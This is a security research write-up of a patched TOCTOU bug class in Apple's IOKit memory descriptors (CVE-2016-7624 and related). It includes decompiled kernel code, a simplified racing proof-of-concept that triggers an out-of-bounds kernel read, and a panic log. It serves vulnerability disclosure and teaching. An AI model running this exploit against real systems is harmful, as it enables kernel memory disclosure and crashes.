Racing for everyone: descriptor describes TOCTOU in Apple's core

This blog post is about a new class of vulnerabilities in IOKit that I discovered and reported to Apple in 2016. A brief scan with an IDA script on macOS turned up at least four bugs, with three CVEs assigned (CVE-2016-7620/4/5); see https://support.apple.com/kb/HT207423. I was told afterwards that there were even more issues of this type in the iOS/OS X IOKit drivers, and fortunately Apple fixed those as well.

Lecture time: IOKit revisited

Recall the classic userspace IOKit call entry point:

kern_return_t
IOConnectCallMethod(
    mach_port_t      connection,        // In
    uint32_t         selector,          // In
    const uint64_t  *input,             // In
    uint32_t         inputCnt,          // In
    const void      *inputStruct,       // In
    size_t           inputStructCnt,    // In
    uint64_t        *output,            // Out
    uint32_t        *outputCnt,         // In/Out
    void            *outputStruct,      // Out
    size_t          *outputStructCntP)  // In/Out
{
//...
    if (inputStructCnt <= sizeof(io_struct_inband_t)) {
        inb_input      = (void *) inputStruct;
        inb_input_size = (mach_msg_type_number_t) inputStructCnt;
    }
    else {
        ool_input      = reinterpret_cast_mach_vm_address_t(inputStruct);
        ool_input_size = inputStructCnt;
    }
//...
        else if (size <= sizeof(io_struct_inband_t)) {
            inb_output      = outputStruct;
            inb_output_size = (mach_msg_type_number_t) size;
        }
        else {
            ool_output      = reinterpret_cast_mach_vm_address_t(outputStruct);
            ool_output_size = (mach_vm_size_t)    size;
        }
    }

    rtn = io_connect_method(connection,         selector,
                            (uint64_t *) input, inputCnt,
                            inb_input,          inb_input_size,
                            ool_input,          ool_input_size,
                            inb_output,         &inb_output_size,
                            output,             outputCnt,
                            ool_output,         &ool_output_size);

//...
    return rtn;
}

If inputStruct is larger than sizeof(io_struct_inband_t), the argument is cast to a mach_vm_address_t and passed by address; otherwise it stays a native pointer.
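
A minimal sketch of that size-based routing decision, assuming io_struct_inband_t is a 4096-byte array (which matches the 4096 check in the MIG stub quoted later in this post). The names INBAND_MAX, struct_route_t and route_struct_input are hypothetical and only illustrate the decision; they are not part of IOKit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumption: sizeof(io_struct_inband_t) == 4096. */
#define INBAND_MAX 4096u

/* Hypothetical record of how one struct argument would travel. */
typedef struct {
    const void *inband_ptr;   /* non-NULL: bytes get copied into the Mach message */
    uint32_t    inband_size;
    uint64_t    ool_addr;     /* non-zero: only the user address is sent */
    uint64_t    ool_size;
} struct_route_t;

/* Mirrors the if/else in IOConnectCallMethod: small buffers go inband,
 * anything larger is passed out-of-line as a raw address. */
static struct_route_t route_struct_input(const void *buf, size_t len)
{
    struct_route_t r = {0};
    if (len <= INBAND_MAX) {
        r.inband_ptr  = buf;
        r.inband_size = (uint32_t)len;
    } else {
        r.ool_addr = (uint64_t)(uintptr_t)buf;
        r.ool_size = len;
    }
    return r;
}
```

A 4096-byte buffer still takes the inband path; one extra byte switches the call to the out-of-line path, where only the address crosses the boundary.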

Is this one race-able? No? Is that one race-able?

A curious mind would ask: is there any possibility that this can be abused to cause a TOCTOU? Historical vulnerabilities focus on racing memory shared via IOConnectMapMemory, whose meaning is obvious from its name (see Pangu's and Ian Beer's research); however, these kinds of vulns are mostly eliminated now.

Eyes turn to these simple and naive IOKit arguments: are these benign little spirits even race-able?

Let's see how these arguments are passed from userspace to kernel space.

In the MIG definitions and the generated code, different input types are handled in different ways.

routine io_connect_method(
        connection      : io_connect_t;
    in  selector        : uint32_t;

    in  scalar_input    : io_scalar_inband64_t;
    in  inband_input    : io_struct_inband_t;
    in  ool_input       : mach_vm_address_t;
    in  ool_input_size  : mach_vm_size_t;

    out inband_output   : io_struct_inband_t, CountInOut;
    out scalar_output   : io_scalar_inband64_t, CountInOut;
    in  ool_output      : mach_vm_address_t;
    inout ool_output_size   : mach_vm_size_t
);

The userspace stub that MIG generates from this definition:

/* Routine io_connect_method */
mig_external kern_return_t io_connect_method
(
    mach_port_t connection,
    uint32_t selector,
    io_scalar_inband64_t scalar_input,
    mach_msg_type_number_t scalar_inputCnt,
    io_struct_inband_t inband_input,
    mach_msg_type_number_t inband_inputCnt,
    mach_vm_address_t ool_input,
    mach_vm_size_t ool_input_size,
    io_struct_inband_t inband_output,
    mach_msg_type_number_t *inband_outputCnt,
    io_scalar_inband64_t scalar_output,
    mach_msg_type_number_t *scalar_outputCnt,
    mach_vm_address_t ool_output,
    mach_vm_size_t *ool_output_size
)
{
//...
    (void)memcpy((char *) InP->scalar_input, (const char *) scalar_input, 8 * scalar_inputCnt);
//...
    if (inband_inputCnt > 4096) {
        { return MIG_ARRAY_TOO_LARGE; }
    }
    (void)memcpy((char *) InP->inband_input, (const char *) inband_input, inband_inputCnt);
//...
    InP->ool_input = ool_input;
    InP->ool_input_size = ool_input_size;

OK, so scalar input and struct input of at most 4096 bytes are copied and bundled inband in the Mach message before being passed to kernel space. No way to race those.

However, struct input larger than 4096 bytes stays a mach_vm_address_t and is passed through untouched.

Now let's dive into kernel space:

kern_return_t is_io_connect_method
(
    io_connect_t connection,
    uint32_t selector,
    io_scalar_inband64_t scalar_input,
    mach_msg_type_number_t scalar_inputCnt,
    io_struct_inband_t inband_input,
    mach_msg_type_number_t inband_inputCnt,
    mach_vm_address_t ool_input,
    mach_vm_size_t ool_input_size,
    io_struct_inband_t inband_output,
    mach_msg_type_number_t *inband_outputCnt,
    io_scalar_inband64_t scalar_output,
    mach_msg_type_number_t *scalar_outputCnt,
    mach_vm_address_t ool_output,
    mach_vm_size_t *ool_output_size
)
{
    CHECK( IOUserClient, connection, client );

    IOExternalMethodArguments args;
    IOReturn ret;
    IOMemoryDescriptor * inputMD  = 0;
    IOMemoryDescriptor * outputMD = 0;

//...
    args.scalarInput = scalar_input;
    args.scalarInputCount = scalar_inputCnt;
    args.structureInput = inband_input;
    args.structureInputSize = inband_inputCnt;

    if (ool_input)
        inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,
                            kIODirectionOut, current_task());

    args.structureInputDescriptor = inputMD;
//...
    if (ool_output && ool_output_size)
    {
        outputMD = IOMemoryDescriptor::withAddressRange(ool_output, *ool_output_size,
                            kIODirectionIn, current_task());
//...
    return (ret);
}

Apple and Linux seem to take different approaches here. In the Linux kernel, incoming userspace content is usually copied into kernel-allocated memory with copy_from_user. Here, however, the Apple kernel creates a memory descriptor directly over the userspace address rather than making a copy.

So can we modify this memory content in userspace after it’s passed to kernel via IOKit call?

Surprisingly, the answer is yes!

This means that for an IOKit call, if the corresponding IOService accepts an input memory descriptor, the userspace program can alter the content while the IOService is processing it: no lock, no write protection. A juicy place for race conditions and TOCTOUs (time-of-check to time-of-use) 🙂 After this bug was fixed I talked to security folks at Apple, and they said even they hadn’t realized that descriptor-mapped memory was writable by userspace.
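
The difference between the two designs can be shown in plain C, without any kernel involved. This is only a sketch: request_t, take_snapshot and take_reference are hypothetical names, with take_snapshot standing in for a copy_from_user-style copy and take_reference standing in for a descriptor that aliases the caller's memory.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical request layout: a count field at offset +4. */
typedef struct {
    uint32_t flags;
    uint32_t count;
} request_t;

/* Copy-style: the callee works on its own private snapshot. */
static request_t take_snapshot(const request_t *user)
{
    request_t copy;
    memcpy(&copy, user, sizeof copy);
    return copy;
}

/* Descriptor-style: the callee keeps a view of the caller's memory,
 * so every later read observes whatever the caller has written since. */
static const volatile request_t *take_reference(const request_t *user)
{
    return user;
}
```

If the caller writes 0x7fffffff into count after both calls, the snapshot still reports the original value while the reference reports the new one. That late write is exactly the window a racing thread exploits.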

I quickly identified several potentially vulnerable patterns in IOReportUserClient, IOCommandQueue and IOSurface; one of them (CVE-2016-7624) is described below. There are far more patterns than that, so use your imagination 🙂

TOCTOU in IOCommandQueue can lead to information disclosure reachable from sandbox

There exists a TOCTOU in IOAccelCommandQueue::submit_command_buffers. This function accepts either an inband struct or a structureInputDescriptor. Attacker-controlled data is passed into the function, and a value at a certain offset is used as a length. The length is validated, but because of how a memory descriptor works, the client can still change the value by modifying the mapped memory before it is actually used, causing a TOCTOU that leads to information disclosure or possibly an OOB write.

Analysis

IOAccelCommandQueue::s_submit_command_buffers accepts user-supplied IOExternalMethodArguments. If a structureInputDescriptor is passed in from a userspace address, the function maps the descriptor through an IOMemoryMap, takes the mapped address and works on it directly. Nothing prevents userspace from modifying the content behind that address, which leads to a TOCTOU.

__int64 __fastcall IOAccelCommandQueue::s_submit_command_buffers(IOAccelCommandQueue *this, __int64 a2, IOExternalMethodArguments *a3)
{
  IOExternalMethodArguments *v3; // r12@1
  IOAccelCommandQueue *v4; // r15@1
  unsigned __int64 inputdatalen; // rsi@1
  unsigned int v6; // ebx@1
  IOMemoryDescriptor *v7; // rdi@3
  __int64 v8; // r14@3
  __int64 inputdata; // rcx@5
  v3 = a3;
  v4 = this;
  inputdatalen = (unsigned int)a3->structureInputSize;
  v6 = -536870206;
  if ( inputdatalen >= 8
    && inputdatalen - 8 == 3
                         * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )
  {
    v7 = (IOMemoryDescriptor *)a3->structureInputDescriptor;
    v8 = 0LL;
    if ( v7 )
    {
      v8 = (__int64)v7->vtbl->__ZN18IOMemoryDescriptor3mapEj(v7, 4096LL);
      v6 = -536870200;
      if ( !v8 )
        return v6;
      inputdata = (*(__int64 (__fastcall **)(__int64))(*(_QWORD *)v8 + 280LL))(v8);
      LODWORD(inputdatalen) = v3->structureInputSize;
    }

We can see that a DWORD at offset +4 of the input is retrieved as a length and compared with a value derived from the total input length: (unsigned int)((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 4). The exact comparison is quoted after the POC below.

The value at this offset is then used again in submit_command_buffers. See the following code:

  if ( *((_QWORD *)this + 160) )
  {
    v5 = (IOAccelShared2 *)*((_QWORD *)this + 165);
    if ( v5 )
    {
      IOAccelShared2::processResourceDirtyCommands(v5);
      IOAccelCommandQueue::updatePriority((IOAccelCommandQueue *)v2);
      if ( *(_DWORD *)(input + 4) )
      {
        v6 = (unsigned __int64 *)(input + 24);
        v7 = 0LL;
        do
        {
          IOAccelCommandQueue::submitCommandBuffer(
            (IOAccelCommandQueue *)v2,
            *((_DWORD *)v6 - 4),//v6 based on input
            *((_DWORD *)v6 - 3),//based on input
            *(v6 - 1),//based on input
            *v6);//based on input
          ++v7;
          v6 += 3;
        }
        while ( v7 < *(unsigned int *)(input + 4) ); //NOTICE HERE
      }

Notice on the line marked NOTICE HERE that *(input+4) is read again as the loop bound. If the user passes in a descriptor, they can modify the value from userland after the check in s_submit_command_buffers has passed, causing the loop to go out of bounds.
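
The double fetch can be reproduced deterministically in userland. The sketch below is a simulation under assumptions, not the driver code: the 8-byte header and 24-byte entries are inferred from the decompiled loop, race_hook_t stands in for the racing thread, and the limit parameter exists only so the sketch itself never reads out of bounds.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define HEADER_SIZE 8u   /* assumed from the decompilation */
#define ENTRY_SIZE  24u  /* v6 += 3 on a 64-bit pointer */

/* Hypothetical hook standing in for the racing userspace thread. */
typedef void (*race_hook_t)(volatile uint8_t *shared);

static uint32_t read_count(const volatile uint8_t *buf)
{   /* little-endian DWORD at offset +4 */
    return (uint32_t)buf[4] | ((uint32_t)buf[5] << 8) |
           ((uint32_t)buf[6] << 16) | ((uint32_t)buf[7] << 24);
}

static void write_count(volatile uint8_t *buf, uint32_t n)
{
    buf[4] = (uint8_t)n;         buf[5] = (uint8_t)(n >> 8);
    buf[6] = (uint8_t)(n >> 16); buf[7] = (uint8_t)(n >> 24);
}

static int size_ok(size_t len)
{
    return len >= HEADER_SIZE && (len - HEADER_SIZE) % ENTRY_SIZE == 0;
}

/* Vulnerable shape: validate the count, then re-read it as the loop bound.
 * Returns how many entries the loop would visit, or -1 if validation fails. */
static long walk_double_fetch(volatile uint8_t *buf, size_t len,
                              race_hook_t hook, uint32_t limit)
{
    if (!size_ok(len) || read_count(buf) != (len - HEADER_SIZE) / ENTRY_SIZE)
        return -1;                                /* time of check */
    if (hook) hook(buf);                          /* attacker's write lands here */
    uint32_t i = 0;
    while (i < read_count(buf) && i < limit)      /* time of use */
        i++;
    return (long)i;
}

/* Safer shape: fetch the count once, validate and use that same value. */
static long walk_single_fetch(volatile uint8_t *buf, size_t len,
                              race_hook_t hook, uint32_t limit)
{
    uint32_t count = read_count(buf);
    if (!size_ok(len) || count != (len - HEADER_SIZE) / ENTRY_SIZE)
        return -1;
    if (hook) hook(buf);                          /* too late to matter */
    uint32_t i = 0;
    while (i < count && i < limit)
        i++;
    return (long)i;
}

/* Simulated attacker: bump the count after validation. */
static void flip_count(volatile uint8_t *shared)
{
    write_count(shared, 0x7fffffff);
}
```

With a 4088-byte buffer whose count is 0xaa, the double-fetch walk runs until the artificial limit once flip_count fires, while the single-fetch walk stops after 0xaa entries.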

In IOAccelCommandQueue::submitCommandBuffer, in the following statement:

    IOGraphicsAccelerator2::sendBlockFenceNotification(
      *((IOGraphicsAccelerator2 **)this + 166),
      (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),
      data_from_input_add_24_minus_8,
      0LL,
      v13);
    result = IOGraphicsAccelerator2::sendBlockFenceNotification(
               *((IOGraphicsAccelerator2 **)this + 166),
               (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),
               data_from_input_add_24,
               0LL,
               v13);

The memory content is sent back to userspace if a notification callback is installed. So if an attacker can arrange for sensitive memory to sit right after the mapped descriptor memory, the out-of-bounds read returns that content to userspace, leading to an infoleak.

The exploit steps are:

  • The userspace program mmaps a memory page and passes it to the IOKit call as structureInputDescriptor.
  • s_submit_command_buffers validates that the value at +4 is consistent with the total incoming structureInput length.
  • submit_command_buffers iterates over the descriptor memory passed in from userspace, using the value at +4 as the loop bound. The memory it reads is processed in submitCommandBuffer and sent back to userspace via the installed asyncNotificationPort.
  • The userspace program races to modify the value at +4, causing the loop to go out of bounds and leak adjacent memory in the kernel address space.

Notice that inputdatalen is first read from structureInputSize, so we cannot use the IOConnectCallMethod API directly: that API cannot pass structureInput and structureInputDescriptor at the same time.

Instead, we directly call the private _io_connect_method function in the IOKit framework, which accepts structureInput and structureInputDescriptor at the same time.

POC code

POC code for all three vulns can be found at https://github.com/flankerhqd/descriptor-describes-racing. Here is a simplified version of one of them:

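volatile unsigned int secs = 10;
// Racing thread: overwrite the count at +4 after the kernel has validated it.
void *modifystrcut(void *arg)
{
    (void)arg;
    *((unsigned int*)(input+4)) = 0x7fffffff;
    printf("secs %x\n", secs);
    return NULL;
}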
    //...
int main(int argc, const char * argv[]) {
    io_iterator_t iterator;
    //...
    getFunc();
    io_connect_t conn;
    io_service_t svc;
    //...
    IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IntelAccelerator"), &iterator);
    svc = IOIteratorNext(iterator);
    printf("%x %x\n", IOServiceOpen(svc, mach_task_self(), 9, &conn), conn);
    //...
    io_connect_t sharedconn;
    IOServiceOpen(svc, mach_task_self(), 6, &sharedconn);
    IOConnectAddClient(conn, sharedconn);
    //then set async ref
    ref = IONotificationPortCreate(kIOMasterPortDefault);
    port = IONotificationPortGetMachPort(ref);
    pthread_t rt;
    pthread_create(&rt, NULL, gaorunloop, NULL);
        io_async_ref64_t asyncRef;
    asyncRef[kIOAsyncCalloutFuncIndex] = callback;
    asyncRef[kIOAsyncCalloutRefconIndex] = NULL;
    //...
    const uint32_t outputcnt = 0;
    const size_t outputcnt64 = 0;
    IOConnectCallAsyncScalarMethod(conn, 0, port, asyncRef, 3, NULL, 0, NULL, &outputcnt);
    //...
    size_t i=0;
    input = dommap();
    {
        char* structinput = input;
    *((unsigned int*)(structinput+4)) = 0xaa;//the size is then used in for loop, possible to change it in descriptor?
    size_t outcnt = 0;
    }
        //...
    const size_t bufsize = 4088;
    char buf[bufsize];
    memset(buf, 'a', sizeof(buf)); // fill exactly bufsize bytes; sizeof(buf)*bufsize would overflow buf
    size_t outcnt =0;
    *((unsigned int*)(buf+4)) = 0xaa;
        //...
    {
        pthread_t t;
        pthread_create(&t, NULL, modifystrcut, NULL);
    //...
    io_connect_method(
                      conn,
                      1,
                      NULL,//input
                      0,//inputCnt
                      buf,//inb_input
                      bufsize,//inb_input_size
                      reinterpret_cast_mach_vm_address_t(input),//ool_input
                      ool_size,//ool_input_size
                      buf,//inb_output
                      (mach_msg_type_number_t*)&outputcnt, //inb_output_size*
                      (uint64_t*)buf,//output
                      &outputcnt, //outputCnt
                      reinterpret_cast_mach_vm_address_t(buf), //ool_output
                      (mach_msg_type_number_t*)&outputcnt64//ool_output_size*
                      );
    }

The two key constants are 4088 and 0xaa; these two numbers satisfy the checks at

 inputdatalen - 8 == 3
                         * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )

and

   if ( *(_DWORD *)(inputdata + 4) == (unsigned int)((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL
                                                                       * (unsigned __int128)((unsigned __int64)(unsigned int)inputdatalen
                                                                                           - 8) >> 64) >> 4) )
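
The magic constant is the usual compiler trick for dividing by a constant. The sketch below restates both checks in readable form, assuming a compiler that supports unsigned __int128 (GCC or Clang on a 64-bit target). The function names and the HEADER_SIZE/ENTRY_SIZE constants are hypothetical labels for what the decompilation implies: an 8-byte header followed by 24-byte entries.

```c
#include <assert.h>
#include <stdint.h>

#define HEADER_SIZE 8u
#define ENTRY_SIZE  24u

/* High 64 bits of x * 0xAAAAAAAAAAAAAAAB, i.e. floor(2x / 3). */
static uint64_t mulhi_magic(uint64_t x)
{
    return (uint64_t)(((unsigned __int128)0xAAAAAAAAAAAAAAABULL * x) >> 64);
}

/* First check, transcribed from the decompiled expression. */
static int size_check_decompiled(uint64_t len)
{
    if (len < HEADER_SIZE)
        return 0;
    uint64_t x = len - HEADER_SIZE;
    return x == 3 * ((mulhi_magic(x) >> 1) & 0x7FFFFFFFFFFFFFF8ULL);
}

/* The same check written the way a human would: the payload after the
 * header must be a whole number of 24-byte entries. */
static int size_check_readable(uint64_t len)
{
    return len >= HEADER_SIZE && (len - HEADER_SIZE) % ENTRY_SIZE == 0;
}

/* Second check: the DWORD at +4 must equal (len - 8) / 24. */
static uint32_t expected_count(uint32_t len)
{
    return (uint32_t)(mulhi_magic((uint64_t)len - HEADER_SIZE) >> 4);
}
```

For a length of 4088 the payload is 4080 bytes, which is 24 * 170, so the first check passes and the expected count is 170, or 0xaa.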

Panic Report

panic(cpu 0 caller 0xffffff801dfce5fa): Kernel trap at 0xffffff7fa039d2a4, type 14=page fault, registers:
CR0: 0x0000000080010033, CR2: 0xffffff812735f000, CR3: 0x000000000ce100ab, CR4: 0x00000000001627e0
RAX: 0x000000007fffffff, RBX: 0xffffff812735f008, RCX: 0x0000000000000000, RDX: 0x0000000000000000
RSP: 0xffffff81276d3b60, RBP: 0xffffff81276d3b80, RSI: 0x0000000000000000, RDI: 0xffffff802fcaef80
R8:  0x00000000ffffffff, R9:  0x0000000000000002, R10: 0x0000000000000007, R11: 0x0000000000007fff
R12: 0xffffff8031862800, R13: 0xaaaaaaaaaaaaaaab, R14: 0xffffff812735e000, R15: 0x00000000000000aa
RFL: 0x0000000000010293, RIP: 0xffffff7fa039d2a4, CS:  0x0000000000000008, SS:  0x0000000000000010
Fault CR2: 0xffffff812735f000, Error code: 0x0000000000000000, Fault CPU: 0x0, PL: 0
Backtrace (CPU 0), Frame : Return Address
0xffffff81276d37f0 : 0xffffff801dedab12 mach_kernel : _panic + 0xe2
0xffffff81276d3870 : 0xffffff801dfce5fa mach_kernel : _kernel_trap + 0x91a
0xffffff81276d3a50 : 0xffffff801dfec463 mach_kernel : _return_from_trap + 0xe3
0xffffff81276d3a70 : 0xffffff7fa039d2a4 com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue22submit_command_buffersEPK29IOAccelCommandQueueSubmitArgs + 0x8e
0xffffff81276d3b80 : 0xffffff7fa039c92c com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue24s_submit_command_buffersEPS_PvP25IOExternalMethodArguments + 0xba
0xffffff81276d3bc0 : 0xffffff7fa03f6db5 com.apple.driver.AppleIntelHD5000Graphics : __ZN19IGAccelCommandQueue14externalMethodEjP25IOExternalMethodArgumentsP24IOExternalMethodDispatchP8OSObjectPv + 0x19
0xffffff81276d3be0 : 0xffffff801e4dfa07 mach_kernel : _is_io_connect_method + 0x1e7
0xffffff81276d3d20 : 0xffffff801df97eb0 mach_kernel : _iokit_server + 0x5bd0
0xffffff81276d3e30 : 0xffffff801dedf283 mach_kernel : _ipc_kobject_server + 0x103
0xffffff81276d3e60 : 0xffffff801dec28b8 mach_kernel : _ipc_kmsg_send + 0xb8
0xffffff81276d3ea0 : 0xffffff801ded2665 mach_kernel : _mach_msg_overwrite_trap + 0xc5
0xffffff81276d3f10 : 0xffffff801dfb8dca mach_kernel : _mach_call_munger64 + 0x19a
0xffffff81276d3fb0 : 0xffffff801dfecc86 mach_kernel : _hndl_mach_scall64 + 0x16
      Kernel Extensions in backtrace:
         com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000->0xffffff7fa03dffff
            dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000
            dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000
         com.apple.driver.AppleIntelHD5000Graphics(10.1.4)[E5BC31AC-4714-3A57-9CDC-3FF346D811C5]@0xffffff7fa03ee000->0xffffff7fa047afff
            dependency: com.apple.iokit.IOSurface(108.2.1)[B5ADE17A-36A5-3231-B066-7242441F7638]@0xffffff7f9f0fb000
            dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000
            dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000
            dependency: com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000
BSD process name corresponding to current thread: cmdqueue1
Boot args: keepsyms=1 -v
Mac OS version:
15F34
Kernel version:
Darwin Kernel Version 15.5.0: Tue Apr 19 18:36:36 PDT 2016; root:xnu-3248.50.21~8/RELEASE_X86_64
Kernel UUID: 7E7B0822-D2DE-3B39-A7A5-77B40A668BC6
Kernel slide:     0x000000001dc00000
Kernel text base: 0xffffff801de00000
__HIB  text base: 0xffffff801dd00000
System model name: MacBookAir6,2 (Mac-7DF21CB3ED6977E5)

Disassembling at the faulting RIP

__text:000000000002929E                 mov     esi, [rbx-10h]  ; unsigned int
__text:00000000000292A1                 mov     edx, [rbx-0Ch]  ; unsigned int
__text:00000000000292A4                 mov     rcx, [rbx-8]    ; unsigned __int64
__text:00000000000292A8                 mov     r8, [rbx]       ; unsigned __int64

We can see that at the crash address rbx has already gone out of bounds and hit an adjacent unmapped area, which leads to the crash.

Tested on MacBook Airs and MacBook Pros running 10.11.5, with the command line
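
The register dump lets us work out how far the loop got. The sketch below assumes that R14 holds the base of the mapped input buffer and that R15 is the loop counter; both are inferred from the values in the panic report rather than confirmed against source. The helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define FIRST_ENTRY_OFFSET 24u  /* v6 = input + 24 */
#define ENTRY_SIZE         24u  /* v6 += 3, three 8-byte words */

/* The faulting instruction is `mov rcx, [rbx-8]`. */
static uint64_t faulting_address(uint64_t rbx)
{
    return rbx - 8;
}

/* Which loop iteration does this rbx value belong to? */
static uint64_t loop_index(uint64_t rbx, uint64_t buffer_base)
{
    assert(rbx >= buffer_base + FIRST_ENTRY_OFFSET);
    return (rbx - buffer_base - FIRST_ENTRY_OFFSET) / ENTRY_SIZE;
}
```

Plugging in RBX = 0xffffff812735f008 and R14 = 0xffffff812735e000 gives a faulting address of 0xffffff812735f000, which matches CR2, and a loop index of 0xaa, which matches R15. In other words, the loop walked all 0xaa validated entries and faulted on the first entry past them, right where it crosses the end of the 4096-byte page, while RAX still holds the raced count 0x7fffffff.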

while true; do ./cmdqueue1 ; done

Fix for these issues

The sources for XNU in 10.12.2 haven’t been released yet, but let’s have a look at the disassembled kernel.

Originally, we have these lines when creating a descriptor:

    if (ool_input)
        inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,
                            kIODirectionOut, current_task());

This is confirmed by disassembling the unpatched kernel:

mov     rax, gs:8
mov     rcx, [rax+308h] ; unsigned int
mov     edx, 2          ; unsigned __int64
mov     rsi, [rbp+arg_8] ; unsigned __int64
call    __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)
mov     r15, rax

While in 10.12.2, the corresponding snippet in _is_io_connect_method changed to:

mov     rax, gs:8
mov     rcx, [rax+318h] ; unsigned int
mov     edx, 20002h     ; unsigned __int64
mov     rsi, [rbp+arg_8] ; unsigned __int64
call    __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)
mov     r15, rax

A new flag (0x20000) is now passed to IOMemoryDescriptor::withAddressRange. With it, Apple fixed this type of vuln in 10.12.2 and iOS 10.2 by marking these descriptors MAP_MEM_VM_COPY, which prevents userspace from modifying the memory after the call. Will it solve these issues once and for all?
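
A small sketch of how the two edx values differ. The numeric values come straight from the disassembly above; the symbolic names are assumptions: 2 matches kIODirectionOut from the original source line, and 0x20000 is believed to correspond to kIOMemoryMapCopyOnWrite in IOMemoryDescriptor.h, which should be checked against the headers once the sources are available.

```c
#include <assert.h>
#include <stdint.h>

enum {
    OPT_DIRECTION_OUT      = 0x00000002, /* kIODirectionOut, edx before the fix */
    OPT_MAP_COPY_ON_WRITE  = 0x00020000  /* assumed name: kIOMemoryMapCopyOnWrite */
};

/* Option bits present after the patch that were not there before. */
static uint32_t added_options(uint32_t before, uint32_t after)
{
    return after & ~before;
}

/* Option bits the patch dropped (none are expected here). */
static uint32_t removed_options(uint32_t before, uint32_t after)
{
    return before & ~after;
}
```

Comparing 0x2 against 0x20002 shows that the direction is unchanged and exactly one bit, 0x20000, was added.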

Credits

Credit also goes to Liang Chen of KeenLab for contributing to this research.
